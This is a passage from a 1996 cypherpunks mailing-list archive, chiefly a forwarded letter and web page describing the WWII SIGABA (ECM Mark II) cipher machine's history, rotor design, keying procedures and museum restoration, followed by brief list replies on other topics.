Date: Thu, 18 Jul 1996 10:42:28 +0800
To: cypherpunks@toad.com
Subject: WW II Cryptography
Message-ID: <v03007402ae117d96fc37@[204.246.66.43]>
MIME-Version: 1.0
Content-Type: text/plain


This came to me recently.  It should be of interest to people here.

Bruce




Dear Mr. Schneier,

If you have an interest in cryptographic history, I am working on a WW II
technology project you might be interested in.  The primary US cipher
system during WW II was  the SIGABA a.k.a. ECM Mark II or CSP-889.  This
machine that was created in 1940 was used until the early sixties when it
was finally retired because it was too slow.  This technology was more
important to the war effort than the incredibly valuable cryptanalytic
successes on Enigma and Purple.  The details of this machine were
classified until April of this year. This machine is significantly
different from the classic Hagelin or  Enigma derivative rotor cipher
machine.  It was one of the top ten most important technologies of WW II,
right up there with radar and proximity fuses but virtually  nothing has
been written about it because it remained classified.

I work on USS Pampanito a WW II submarine on display in San Francisco, CA.
We have the only SIGABA ever to be in private hands on display, the only
other place one can see this machine is at the National Cryptologic Museum
at the NSA.  In addition, I have collected about 2,000 pages of
declassified documents on the machine and its context.  This information,
with the access to the real machine has provided the information necessary
to create an algorthmic description of the machine.  The next  logical step
is to create a software emulation of the machine.

Pampanito is creating a web site that should be up sometime in the next two
weeks that will include the enclosed description of the machine.  I am also
including a short report on the machine we have that includes some
additional detail.  The web page by the way will be the first meaningful
description of this machine ever published.   I would like to create a Java
application that allows people to operate a virtual SIGABA.  The core of
its functionality will probably be about 100 lines of code.  However doing
a reasonable user interface will require quite a bit more code.

1- Would you or anyone you know be interested in collaborating on the Java
software project?

I would like to include at least some cryptographic analysis of the machine
in my description of the machine.  The NSA historians have told me that
properly implemented this would be a formidable algorithm even today
(something I doubt.)  I have all the information needed to describe the
machine.

2- Would you or anyone you know be interested in creating an analysis of
the machine.  I would like this for my web page, and would love to see a
couple of papers on the technology created.  Publication could be in a
wider range of publications than are normally interested in cryptologic
issues.  This may be one of the very last of the really important WW II
technologies to be disclosed.  That combined with the recent interest in
cryptography in public policy might make it a hot for some pretty broad
journals.

Your thoughts would be appreciated.

Yours truly,

Richard Pekelney
========
<html>
<head>
   <title>USS Pampanito - ECM Mark II </title>
   <meta name="GENERATOR" content="Mozilla/2.01Gold (Win32)">
</head>
<body bgcolor="#FFFFFF">

<h2>Electronic Cipher Machine (ECM) Mark II</h2>

<p>By Rich Pekelney</p>

<p>
<hr width="100%" ></p>

<h3>WHAT IS THE ECM MARK II AND WHY IT WAS IMPORTANT:</h3>

<p>The ECM Mark II (also known in the Navy as CSP-888/889 or SIGABA by the
Army) is a cipher machine. It was used aboard <i>USS Pampanito</i> to
encipher messages from ordinary, or what cryptologist (people who study
secret communications) call plain text, into secret language, which is
called cipher text, under the control of a key (encipherment). A
cryptographic system consists of the combination of cipher machine,
operating procedures and management of keys. If the system is well designed
and implemented correctly, cipher text can only be converted back to plain
text (deciphered) by someone with all three elements of the system.</p>

<p>In early September 1944 U.S.Fleet Radio Unit Pacific (FRUPAC) in Hawaii
recorded a Japanese cipher radio message that originated from Singapore.
Unknown to the Japanese, U.S. forces had analyzed many Japanese messages
and as a result of much brilliant and hard work were able to reproduce
their enemy's inadequately designed and implemented cryptographic system.
This is called cryptanalysis or &quot;breaking the system&quot;. FRUPAC
deciphered (and decoded) the message that announced the route of an
important Japanese convoy from Singapore to Japan. The timing and expected
path of the convoy from the message was enciphered on an ECM in Hawaii and
sent to <i>Pampanito</i> where it was deciphered on an ECM. Although
<i>Pampanito</i>'s crew did not know how FRUPAC got its information, they
were able to go directly to the convoy's path and attack with great
efficiency. <i>Pampanito</i>'s attack was kept secret by the superior U.S.
cryptographic system that revolved around the ECM Mark II.</p>

<p>The ECM Mark II based cryptographic system was never broken by an enemy
and was secure throughout WW II. The system was retired by the U.S. Navy in
1959 because it was too slow to meet the demands of modern naval
communications. Axis powers (primarily Germany) did however periodically
break the lower level systems used by Allied forces. Early in the war
(notably during the convoy battle of the Atlantic and the North Africa
campaign) the breaking of Allied systems contributed greatly to Axis
success.</p>

<p>In contrast, the Allies were able to break Axis communications for most
of the war supplying many of the targets attacked by <i>Pampanito</i>.
Intercepted messages provided not only the location of potential targets,
but often insight into the thinking of enemy commanders. In the Pacific,
this information was critical to success in the battles of Midway and the
Coral Sea in 1942. The combination of secure U.S. cryptographic systems and
vulnerable Axis systems directly contributed the success of the Allied
powers during WW II thereby shortening the war by years and saving
countless human lives.</p>

<p>A picture of an ECM (labeled SIGABA) may be found on the National
Cryptologic Museum web site <a
href="http://www.nsa.gov:8080/museum/big.html">The &quot;Big&quot; Machines
Exhibit</a> . Note this is a large (613K) color picture.</p>

<h3>THE ECM MARK II'S DEVELOPMENT: </h3>

<p>The ECM Mark II's critical cryptographic innovation (the Stepping Maze)
over Hebern's and other precursors was created by Army cryptologists Frank
B. Rowlett and William F. Friedman shortly before 15 Jun 1935. During
October and November of 1935 Friedman disclosed the details of the
&quot;Stepping Maze&quot; to the Navy's cryptologists including Lt. Joseph
N. Wenger. Aside from filing secret patent application 70,412 on 23 Mar
1936 little additional development was performed by either the Army or Navy
until Lt. Wenger discussed the patent with Cmdr. Laurence Safford during
the winter of 1936-37. Cmdr. Safford recognized the potential of the
invention and the Navy began sponsoring and financing a new machine
including the &quot;Stepping Maze&quot;. Additional innovations by Cmdr.
Safford, Cmdr. Seiler and the Teletype Corporation including Mr. Reiber and
Mr. Zenner added to the security, reliability and manufacturability of the
ECM Mark II. Prototypes were soon delivered, and in February 1940 the
machine's details were disclosed to the Army. Amazing as it may seem, the
Navy had kept its continuing development of the machine secret from the
Army. With minor changes suggested by the Army the machine was accepted as
the primary cipher machine for use by both Army and Navy.</p>

<p>The joint Army-Navy ECM Mark II cryptographic system became effective on
1 Aug 1941, and the two services had the common high-security cryptographic
system in place and in use prior to the attack on Pearl Harbor. The use of
a common system was of great military value, particularly during the early
stages of the war when the distribution of machines and codewheels was
incomplete. By 1943, over 10,000 machines were in use. The &quot;Stepping
Maze&quot; and use of electronic control were a generation ahead of the
systems employed by other countries before and after WW II. No other
country is known to have ever broken the ECM Mark II cryptographic
system.</p>

<h3>WHERE IS THE ECM MARK II TODAY:</h3>

<p>After newer, faster cryptographic systems replaced the ECM Mark II the
machines were systematically destroyed to protect the secrets of their
design. Today probably less than a dozen ECMs still exist. The <a
ref="http://www.nsa.gov:8080/museum">National Cryptologic Museum</a> (a
part of the National Security Agency) has 6 machines, one of which is on
display in their Fort George Meade, MD museum. The U.S. Navy has 2
machines, one of which is displayed aboard Pampanito in San Francisco, CA.
When recently contacted the US Army historians did not believe they had any
machines. </p>

<p>The ECM Mark II aboard <i>Pampanito</i> may be the only fully operable
ECM Mark II today. This machine was built in June of 1943 as a CSP-889, and
sometime ca. 1950 it was modified into a CSP-889-2900. The minor
modifications added one switch and a knob that allow operation compatible
with CSP-889 machines, or enhanced security when operated as a CSP-2900.
</p>

<h3>WHAT CIPHER EQUIPMENT WAS ABOARD PAMPANITO DURING WW II:</h3>

<p>Just before leaving on each war patrol, one officer and one enlisted man
armed with a machine gun would draw the cipher equipment from its secure
storage. There were two lists of cipher equipment and manuals, List A
included an ECM Mark II and associated documents, List B did not include
the ECM. For most patrols List A was used, if the patrol was particularly
dangerous and in shallow waters List B was used.</p>

<p><b>CSP-888/889 = ECM Mark II = M-134-C = SIGABA</b>. This was a
first-rate, electro-mechanical, rotor wheel cipher machine and the physical
component of the primary cryptographic system used by the United States.
First-rate cryptographic systems are those that you believe cannot be
broken by an enemy in a useful period of time even if they are in
possession of the physical elements of the system, provided the other
elements of the system are preserved (i.e. keys are kept secret, operating
procedures are well designed and followed, number and size of messages per
key are small, etc.) The CSP-888 model lacked plugs necessary for tandem
operation, but was otherwise identical to the later CSP-889 model.  CSP-890
is a pluggable rotor that was carried for use in the CSP-888/889.</p>

<p>Pampanito did not use any Second-rate cryptographic systems such as the
British Type-X or U.S. CCM.</p>

<p><b>CSP-845 = M138A = CSP-1088</b>. This was a third-rate, paper strip
cryptographic system that was used by U.S. Submarines when they were on
such dangerous missions that they could not risk the capture of an ECM. It
was also used to communicate with forces that did not have an ECM.
Third-rate cryptographic systems can be read by an enemy in possession of
the physical elements of the system, even if the other elements of the
system are preserved.</p>

<p><b>CSP-1500 = M-209 = C-38</b>. This is a fourth-rate, Hagelin
derivative, mechanical cryptographic system. Over 140,00 of these were used
by Allied forces during the war and they were regularly broken by the
enemy. Pampanito would have used this to communicate with forces that did
not have an ECM. Fourth-rate cryptographic systems can be broken by an
enemy by purely cryptoanalytical means without possession of any parts of
the system.</p>

<p><b>CSP-488 = M-94</b>. This is a low level, fourth rate, rotary disk,
Jefferson type cipher. It was used to communicate with forces that did not
have an ECM.</p>

<p><b>CSP-1270</b> Chart style authentication cipher, CSP-1272 are its
instructions.
<br><b>CSP-1286</b> Two card style authentication cipher, CSP-1521 are its
instructions.
<br><b>CSP-1750</b> Call sign cipher, CSP-1751 are its instructions.
<br><b>CSP-1300</b> Weather cipher. </p>

<h3>DETAILS OF THE ECM MARK II CIPHER UNIT:</h3>

<p>Prior to the ECM Mark II many cipher machines incorporated encipherment
by means of an electric current passing through a series of cipher wheels
or rotors. A character is typed on a keyboard, passed through the rotors
and either printed or displayed in a light board for the operator. The
rotors are thin disks with contacts on each side that are wired at random
to the other side one wire per contact. Typically a rotor will have 26
contacts on each side, each contact representing a letter of the alphabet.
A current passing through the rotor disk might enter in the position of
letter B and exit in the position of letter G. Encipherment occurs by
passing the current through several rotors that are side by side and
rotating one or more of the rotors between each character enciphered. If
the deciphering machine starts with rotors of the same design and in the
same positions as the enciphering machine, it will repeat the motion of the
rotors thereby deciphering the text. The most important difference between
previous machines and the ECM is how the enciphering rotors are stepped.
The &quot;Stepping Maze&quot; uses rotors in cascade formation to produce a
more random stepping of the cipher rotors than existed on previous
electromechanical cipher machines.</p>

<p>The ECM has fifteen rotors arranged in three rotor banks. The five
rotors in the rear are the cipher rotors that convert a plain-text letter
into a cipher-text letter as they are irregularly stepped. Electrical
currents passing first through the control (middle) rotor bank and then
through the index (front) rotor bank determine which cipher rotor(s) step.
The center three of five control rotors step in a metered fashion. Control
rotor 3 is the fast rotor and steps once for each character typed. Control
rotor 4 is the medium rotor and steps once each time control rotor 3
completes a full rotation. Control rotor 2 is the slow rotor and steps once
each time control rotor 4 completes a full rotation. Control rotors 1 and 5
do not step. The index rotors are positioned once each day and do not move
while operating. The 10 cipher and control rotors are large 26 contact
rotors that may be used interchangeably in the cipher or control bank and
are reversible. The five smaller, 10 contact, index rotors are only used in
the index bank. Four contacts are energized on the first rotor of the
control rotor bank. The connections between the last rotor of the 26
contact control bank and the first rotor of the 10 contact index bank are
in 9 groups of between 1 and 6 wire(s) each. One of the index bank contacts
is not used. The 10 outputs of the last index rotor are attached in pairs
to 5 magnets that step cipher rotors when energized. Between 1 and 4 cipher
rotors are stepped for each character enchiphered.</p>

<p>To properly encipher a message, the three banks of rotors must be
arranged and aligned in such a way that they can be reproduced by the
deciphering operator. The particular arrangement and alignment of the
rotors selected by the enciphering operator and transmitted to the
deciphering operator in disguised form constitutes the keying instructions.
</p>

<p>The design of the ECM limited the erratic stepping so that at least 1,
and not more than 4 cipher rotors step at a time. Even so, a crude,
exhaustive search would require an enemy to check around 10 to the 14th
permutations of code, index and control rotor starting positions. The
combination of modern algorithms and the availability of high speed
computers mean this system is no longer secure, but during its term of
service it provided an unprecedented level of security.</p>

<h3>KEYING (OPERATING) THE ECM MARK II:</h3>

<p>This outline of the June 1945 (SIGQZF-2) keying procedure describes how
key lists were used to assemble and align the rotors before enciphering a
message. The first instructions from July 1941 (SIGQZF) were changed in
June 1945 (SIGQZF-2) and again November 1945 (SGIQZF-3). For example,
SIGQZF-3 uses a totally different method of determining message indicators
that eliminated the need for a daily rotor alignment of the control and
cipher rotors. Changes were made to minimize operator errors, enhance
security and speed up the operation.</p>

<p>Although the index rotors were reassembled (changing the order of the
rotors) once a day during most of the war (SIGQZF), starting with SIGQZF-2
they were kept in a fixed order not requiring daily reassembly. The
operator consults the secret daily keylist and aligns (rotates) the index
rotor wheels differently for secret, confidential and restricted messages.
The index rotor alignment is only changed when either the day ends, or the
classification of message to be encrypted changes.</p>

<p>Control and cipher rotors are also reassembled once a day from the
secret daily keylist, their alignment however, was changed with each
message. After the daily assembly of all rotors and the alignment of the
index rotors, a check group is used to verify the initialization and
operation of the machine before any real messages are encrypted. The rotors
are zeroized, (cipher and control rotors positioned on &quot;O&quot;) and
the letter A is repeatedly encrypted until 30 cipher text characters are
printed. Then the 26th-30th letters are matched with the check group
supplied in the secret daily keys.</p>

<p>For each message, the secret daily keylist is consulted, and the control
and cipher rotors are aligned to an initial position depending on the
classification of the message. Now the operator selects a group of any five
letters, except Z, at random to be the internal message indicator. This
internal message indicator is then enciphered and the external message
indicator (enciphered internal message indicator) is printed on the tape
and transmitted with the message. The control and cipher rotors are then
aligned without printing to the internal message indicator. The rotors are
never aligned to the external message indicator (the letters printed on the
tape), but always to the internal message indicator. Now the body of the
message may be enciphered and transmitted with the external message
indicator. If the plain text exceeds 350 5-letter groups, the plain text
must be divided into 2 or more equal parts so that no part exceeds 350
groups. For each part a
new internal message indicator is selected.</p>

<h3>COMPLIANCE WITH OPERATING PROCEDURES:</h3>

<p>The security of a cryptographic system relies as much on the operation
of the cipher machine as the machine itself. During WW II the U.S. created
organizations to formally train operators and to monitor U.S. operators
compliance with procedure. When an error was found the first response was
often a memorandum such as the one replicated below. It provides a list of
the most common errors that could compromise the security of the
cryptographic system.</p>

<p><tt>Navy Department
<br>Office of Chief of Naval Operations
<br>Washington, D.C. </tt></p>

<p><tt>CLASSIFICATION: CONFIDENTIAL     Date: 27 Dec 1943</tt></p>

<p><tt>MEMORANDUM
<br>COMMUNICATION IMPROVEMENT ITEM</tt></p>

<p><tt>From: Director Naval Communications
<br>To: Commandant, Twelfth Naval District</tt></p>

<p><tt>The principles of communication security cannot be overstressed, for
such security is vital to the success of operations. Errors which seem
minor in themselves may, when accumulated, offer to the enemy an entering
wedge for the eventual compromise of a system. The object of this
memorandum is to enlist your cooperation in protecting our cipher systems
and hence our national security. </tt></p>

<p><tt>THE PRICE OF SECURITY IS ETERNAL VIGILANCE. </tt></p>

<p><tt>A communication such as COM 112 222105 DECEMBER may endanger our
interests because it appears to violate security principles in the
following respect(s): </tt></p>

<p><tt>DRAFTING: Plain language reference to encrypted dispatches.</tt></p>

<p><tt>No reply to this memorandum is necessary, but your cooperation in
supressing dangerous communication practices is earnestly solicited.
</tt></p>

<p><tt>CARELESS COMMUNICATIONS COST LIVES</tt></p>

<p><tt>The following is a list of some of common violations of security
principles: </tt></p>

<p><tt>DRAFTING: </tt></p>

<p><tt>Unnecessary word repetition
<br>Unnecessary or improper punctuation
<br>Plain language reply to encrypted dispatch
<br>Classification too high
<br>Precedence too high
<br>Cancellation in plain language of an encrypted dispatch</tt></p>

<p><tt>ENCRYPTION: </tt></p>

<p><tt>&quot;XYX&quot; or &quot;X&quot;'s for nulls
<br>&quot;XX&quot; &amp; &quot;KK&quot; to separate padding from text
<br>Same letters at both ends to separate padding from text
<br>Continuity of padding
<br>Seasonal and stereotyped padding
<br>Repetition of generatrices
<br>Systematic selection of generatrices
<br>Using plain text column for encryption
<br>Proper strips not eliminated as prescribed by internal indicator (Ed.
Note: CSP-845)
<br>Improper set-up according to date
<br>Using system not held by all addressees
<br>Failing to use system of narrowest distribution</tt></p>

<p><tt>CALLS: </tt></p>

<p><tt>Enciphering indefinite call sign
<br>Enciphering call signs of shore activities
<br>CODRESS might have been used</tt></p>

<p><tt>TRANSMISSION: </tt></p>

<p><tt>Classified dispatch transmitted in plain language by wire or radio,
when not specifically authorized.
<br>Dispatch might have gone to some or all addressees by mail. </tt></p>

<p>
<br></p>

<h3>SOME ECM MARK II SPECIFICATIONS:</h3>

<p><b>Input:</b> Keyboard or electric via tandem plug.
<br><b>Output: </b>Printed tape or electric via tandem plug.
<br><b>Speed: </b>45 to 50 Words per minute.
<br><b>Power Supply: </b>40/70 cycle, 105-125 VAC or 105-125 VDC or 24 VDC
<br>2 amps at 120 volts AC or DC, 3 amps at 24 VDC. </p>

<p><b>Approximate Size: </b></p>

<p><b>In operation: </b>15&quot; x 19.25&quot; x 12&quot; or 2.1 cubic feet
<br><b>In carrying case: </b>17.125&quot; x 23&quot; x 15.5&quot; or 3.5
cubic feet
<br><b>Packed for long term: </b>19.5&quot; x 27.5&quot; x 18&quot; or 5.6
cubic feet</p>

<p><b>Approximate Weight</b>: </p>

<p><b>In operation: </b>93.5 lbs.
<br><b>In carrying case: </b>133.5 lbs.
<br><b>Packed for long term: </b>195 lbs. </p>

<p><b>Cost: </b></p>

<p>By 1943, 10, 060 ECM Mark II's were purchased at an estimated cost of
$2,040 a piece. This does not include the cost of spare parts; additional
code wheel sets, code wheel wiring that was done by the military;
modifications and upgrades, precursor machine development, etc. </p>

<h3>REFERENCES:</h3>

<p>The information enclosed here relating to the ECM Mark II was edited and
excerpted from:
<br><i>Army Signal Security Agency (1946) History Of Converter M-134-C
(Sigaba) Vol I, II And III </i>This is available from the US National
Archives and Records Administration (NARA); NSA Historical Collections
190/37/7/1, Box 799, F: 2292, pp 468. </p>

<p><i>Safford, L.F. (1943) History of Invention And Development of the Mark
II ECM (Electric Cipher Machine)</i> This available from NARA. SRH-360 in
RG 0457: NSA/CSS Finding Aid A1, 9020 US Navy Records Relating to
Cryptology 1918-1950 Stack 190 Begin Loc 36/12/04 Location 1-19. In Feb
1996 the version at NARA was redacted, but the full document is now
declassified.</p>

<p>Specifications for an ECM Mark II are from:
<br><i>Army Security Agency (1948) Historical and Cryptologic Summary of
Cryptosystems; ASAG 23; Vol 1. </i></p>

<p>ECM Mark II Keying, Operating and Maintenance instructions are in:
<br><i>War Department Office of The Chief Signal Officer (1941) Operating
Instructions for Converter M-134-C (short title: SIGBWJ)
<br>War Department Office of The Chief Signal Officer (1941) Operating
Instructions for Converter M-134-C (short title: SIGLVC)
<br>Department of the Army (1941) Crypto-Operating Instructions for
Converter M-134-C (short title: SIGQZF)
<br>Department of the Army (1945) Crypto-Operating Instructions for
Converter M-134-C (short title: SIGQZF-2)
<br>Department of the Army (1946) Crypto-Operating Instructions for
Converter M-134-C (short title: SIGQZF-3)
<br>Department of the Army (1949) ASAM 1/1 Crypto-Operating Instructions
for ASAM 1. </i>Note the new designation of ASAM 1 for the ECM Mark II
after the war.
<br>War Department (1942) Maintenance Instructions for Converter M-134-C
(short title: SIGKKK)
<br><i>War Department (1945) Maintenance Instructions for Converter M-134-C
(short title: SIGKKK-2)
<br></i>SIGQZF, SIGBWJ, SIGLVC, SIGKKK, SIGKKK-2 are available from NARA;
NSA Historical Collections 190/37/7/1, NR 2292 CBLL36 10622A 19410300.</p>

<p>General information including security of the ECM Mark II are in:
<br><i>War Department (1945) General Instructions For Converter M-134-C
(short title: SIGBRE-1)</i> This is available from NARA; NSA Historical
Collections 190/37/7/1, NR 4588 ZEMA35 13909A 19450600 </p>

<p>A list of cipher equipment carried by submarines in the Pacific is in:
<br><i>Submarine Force U.S. Pacific Fleet (1944) Cryptographic Aids
Check-Off List </i>This is available from NARA, Pacific Sierra Regional
Archive, 181-58-3201, S1313, S372, A6-3/N36 Cryptographic Aids.</p>

<p>Information on the overall history of Naval Communications during WW II
may be found in:
<br><i>US Naval Administration in WW II, History of Naval Communications,
1939-1945. Op-20A-asz, A12, Serial 00362P20, 7 Apr 1948. </i>This is
available from the Naval Historical Center; WW II Command File CNO;
Communications History; Microfiche No. F3561. </p>

<p>Compliance with Operating Instructions notes are from:
<br><i>Office of Chief of Naval Operations (1943) Memorandum Communication
Improvement Item. </i>This is available from the NARA, Pacific Sierra
Regional Archive, RG 181-58-3224, 12th ND Commandants Office General
Correspondence, A6-2(1) Complaints - Discrepencies, Security-etc. </p>

<p>Descriptions of the the Authentication Systems may be found in:
<br><i>Survey Of Authentication Systems 1942-45 (1945)</i> This is
available from NARA; NSA Historical Collections 190/37/7/1, NR 3526 CBRK24
12960A 19420728.</p>

<h3>ADDITIONAL READING:</h3>

<p>History of cryptology:
<br><i>Kahn, D. (1967) The Codebreakers. New York, NY: Macmillan Publishing
Company.
<br>Bamford, J. (1982) The Puzzle Palace. Boston, MA: Houghton Mifflin
Company. </i></p>

<p>Background on the history of intelligence in the Pacific may be found in:
<br><i>Holmes, W.J. (1979) Double-Edged Secrets. Annapolis, MD: Naval
Institute Press.
<br>Layton, E., Pineau, R., Costello, J (19 ) And I Was There. New York,
NY: William Morrow and Company, Inc.
<br>Prados, J. (1995) Combined Fleet Decoded. New York, NY: Random House.
</i></p>

<p>On the subject of Cryptanalysis of rotor systems:
<br><i>Andleman, D., Reeds, J. (1982) On Cryptanalysis of Rotor Machines
and Substitution-Permutation Networks. IEEE Transactions on Information
Theory, IT-28(4), 578-584.
<br>Deavours, C., Kruh, L. (1985) Machine Cryptography and Modern
Cryptanalysis. 35-92. Dedham, MA: Artech House Inc. </i></p>

</body>
</html>

======= Not part of the web page, additional information. ====
- The ECM displayed (starting in July) aboard U.S.S. Pampanito is a
CSP-889-2900 on loan from the Naval Security Group.  It has "12-29-43 BTS"
stamped into the bottom, and "CONT. AX? 1728", "ACCEPTED JUN 1943" with an
indecipherable mark printed in orange ink.  The print unit ENG-108 is
serial number 999 which is consistent with 1943 manufacture.  There is no
name plate on the unit or the rotor cage. The top housing has holes and an
outline in the appropriate location and size to hold a the Cleaning
Instruction plate added in Dec 1943, these holes have been painted over.
Inside the machine were two pieces of paper.  The first was a 3x5" card on
which was printed in ink "Bacchus / Gorgon".  The second is a memorandum of
call form revised in 1967 on the back of which was printed in pencil
"Baccus CSP 2900", "Basket CSP 2899".  The code names Bacchus and Gorgon
were used during the 1950s for CSP 2900 based systems.

The machine arrived in pretty good condition, after mechanical and
electrical safety checks, and a new ribbon we have tested its operation
successfully. The cipher and control rotors are test rotors (wired straight
through) so the cipher wheel stepping is not very erratic.  The index
rotors are wired, changing their setup does change the cipher wheel
stepping. We will be seeking the loan of a wired set of wheels from the NCM
at NSA.  If this fails, we may choose to make a temporary and reversible
change to several of the Cipher and Control rotors.  This will provide an
adequate simulation showing random stepping of cipher wheels and
unintelligible cipher text.

The machine was cleaned and lubricated according to SIGKKK-2, 1945.  To
minimize realignment the main rotor shaft was lubricated in place and the
printer unit was removed, but not separated.  The printer unit should be
removed, separated, cleaned and the center shaft lubricated.  We are trying
to find drawings or descriptions of "pawl release rod" 100707, "assembly
studs" 100708, and "assembly ring" 100706.  We will attempt separating the
unit when we have determined if we can find info on these tools that will
facilitate assembly.  When received, during encrypt the tape was not
spacing in 5 character groups, it advanced to the space and stopped
advancing.  This corrected itself after cleaning and may be caused by a
weakened spring.  Lubricants were used as described: 100983 oil (SAE 20) -
We used SAE 20 synthetic bicycle fork lubricating oil. 100984 grease (light
grease). 108607 "Lubriplate #105" Lubriplate #105 has been in continuos
production without change in formula by Fiske Bros. Refinery, Newark, NJ
(201-589-9150) since 1933.  It was in stock at Coast Marine with "space
age" printed on the tube.  A thin coat of DeOxit from CAIG was used on
exposed leaf contacts in the build up switches.  Cleaning was done with
tech wipes and a non-residual electrical cleaning spray (tested on the
plastic first).  No abrasives were used.

The CSP-2900 model was developed by the Navy ca. 1950 (SRH-360).  The unit
has two switches in the position that a CSP-889 has only one.  The new
switch is marked 889/2900.  There is also a knob marked 889 F/2900 R
extending out on the left of the keyboard. Near the 889 F/2900 R knob the
housing looks like it underwent some hand work to fit the shaft, this is
all painted.  I believe it was built as a CSP-889 and later modified to
CSP-889-2900. There is an added (not CSP-889) mechanism that appears to be
a counter with a switch that is adjusted so it does not function.  Perhaps
it was connected to an external device.

Floating loose in the machine was a single metal stud that appears to be
unrelated to the machine, possibly a piece of construction debris.  I have
replaced the ribbon with an Okidata printer ribbon (this ribbon is on a
plastic spool.)  The original ribbon, stud and the notes are in a plastic
bag kept with the machine.  The machine was received bolted to the bottom
of the carrying case, we did not get the top of the carrying case.  There
were no wooden shims in the case to protect the rubber shock mounts.  There
is no cover for the print head.

The details below elaborate on the general description provided in History
Of Converter M-134-C (1949 Army History).  I have only included the details
that I noticed where different from the description.  My convention is to
label the rotor contacts when the rotor is in the zeroized position, not
reversed, as printed (i.e. counter clockwise).  The same for index rotors,
i.e. with the units digit zero on top, i.e. 10, 20, 30, 40, 50 showing as
the starting position, unit digits increase in a counter clockwise manner.
I do not know if these are the conventions used elsewhere.

With first switch in the 889 position, the second switch in the OPERATE
position, the control switch on E and the knob selecting 889 F:

The right of the control rotor bank has the TUVW contacts at 60 VAC, the RS
contacts are energized to 16.2 VAC,.  I believe the voltage on the RS
contacts is unintended leakage from the 889/2900 switch, before cleaning
these were at 25 VAC.

The connections between the left plate of the index bank (number) and the
left plate of the control bank (letters) are below.
1-P, 2-Q, 3-RS, 4-TUV, 5-WXY, 6-ZABC, 7-DEFGH, 8-IJKLMN, 9-O, 0-no connection

All cipher rotors turn in a clockwise rotation.

With first switch in the 2900 position, the second switch in the OPERATE
position, the control switch on E and the knob selecting 2900 R:

The right of the control rotor bank has RSTUVW contacts are energized to
60.3 VAC.

The connections between the left plate of the index bank (number) and the
left plate of the control bank (letters) are below.
1 - P, 2-Q, 3-RS, 4-TUV, 5-WXY, 6-ZABCD, 7-GH, 8-KLMN, 9-O, 0- IJ

Cipher rotors 2 and 4 turn counter-clockwise, 1, 3, 5 turn clockwise.  The
2900 R knob is mechanically linked to the cams that turn rotors 2 and 4.
The knob and first switch both must select either 889 or 2900 to operate.

In either position of the first switch (889 or 2900) or knob (889 F or 2900
R), second switch in OPERATE position, control switch on E:

The cipher rotor solenoids (first number) are connected to right of the
index bank (second number).
1-09, 2-87, 3-56, 4-34, 5-12

The keyboard is wired to the left plate of the cipher bank in a sequential
manner with A on top proceeding clockwise.  Note this is opposite of the
rotors that are labeled in a counter clockwise manner.  Z position of the
cipher bank is occupied by the spacebar.  (During encipher typing Z
generates an encrypted X.) When the control switch is in D (decipher)
position the right plate instead of left plate of the cipher bank is
connected to the keyboard as expected.

Probably only a dozen or so ECMs still exist.  The NSA has 6 they know of.
The Navy has 2, one of which is aboard Pampanito.  They Army may have a
couple, but NCM did not know.  We have the only one that is operated. (NCM
estimate Jun 96.)



--
Richard Pekelney
Internet: pekelney@rspeng.com
Phone: 1-415-563-5928
Fax: 1-415-563-5787







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Jul 1996 02:54:47 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <ae10a39c010210045882@[205.199.118.202]>
Message-ID: <Pine.GUL.3.94.960716121912.21153C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Timothy C. May wrote:

> There were some flames, which I mostly ignored. Also, a peculiar kind of
> flame war dealt with endless speculations about his "motives." Utter
> nonsense, from careful reading of his views. That is, to insinuate that he
> is an agent of the NSA or the Bilderberger Grand Conspiracy merely because
> he (then) argued that Clipper was not as bad as most of us thought it
> was...well, that's just nonsensical.

But he's still a fucking statist.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMevrWJNcNyVVy0jxAQEOKQIAkR1jvexshPPQ3ceFJE5CZOu/Hxo0Zfrc
dZlMN5pmkNkgxpiXuvaQ3C9HOVJSvLHkTczEHlrtRxPjmuM5hQdN6w==
=C+sD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Thu, 18 Jul 1996 03:24:27 +0800
To: snow <snow@sybase.com>
Subject: Re: Seek-and-Destroy
Message-ID: <9607161921.AA14315@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I tried it...

it just seemed to threaten me for about 10 minutes, and
then disconnected.  Couldn't see any effect.

What was supposed to happen?

    Ryan

---------- Previous Message ----------
To: declan
cc: cypherpunks
From: snow @ smoke.suba.com @ smtp
Date: 07/15/96 04:20:54 PM
Subject: Re: Seek-and-Destroy

On Mon, 15 Jul 1996, Declan McCullagh wrote:

> Do NOT visit:
>   http://xxx.lanl.gov/seek-and-destroy
> 

     So of course I did. Very Interesting. 
    
     Those guys *rock*.

> The sysadmins for xxx.lanl.gov don't like robots visiting their web site,

     They also aren't real happy with PC's, Mac's, or Netscape. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Thu, 18 Jul 1996 08:58:54 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <199607161935.MAA07689@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> There has been some discussion at the last couple of crypto conferences
> about possible ways around this plan.  (I guess the idea goes back at
> least a year or two.)
> 
> One idea is to register a 2048 bit public key.  You have to give the
> secret key to the government in order to use the registry.  But what you
> do is to create a second key and embed it in the first.  It is, say, a
> 1024 bit key which is the lower half of the 2048 bit key.  It has
> different secret factors that nobody but you knows.  Then when people
> send you messages they encrypt using this modulus rather than the
> official one.
> 
> You get the benefit of the government-sponsored key certificate
> infrastructure, but the government is not able to crack your
> communications.

Sorry, but the government generates all keys.  Otherwise people might
mess up and choose insecure keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jul 1996 09:04:50 +0800
To: cypherpunks@toad.com
Subject: Re: Surf-filter lists
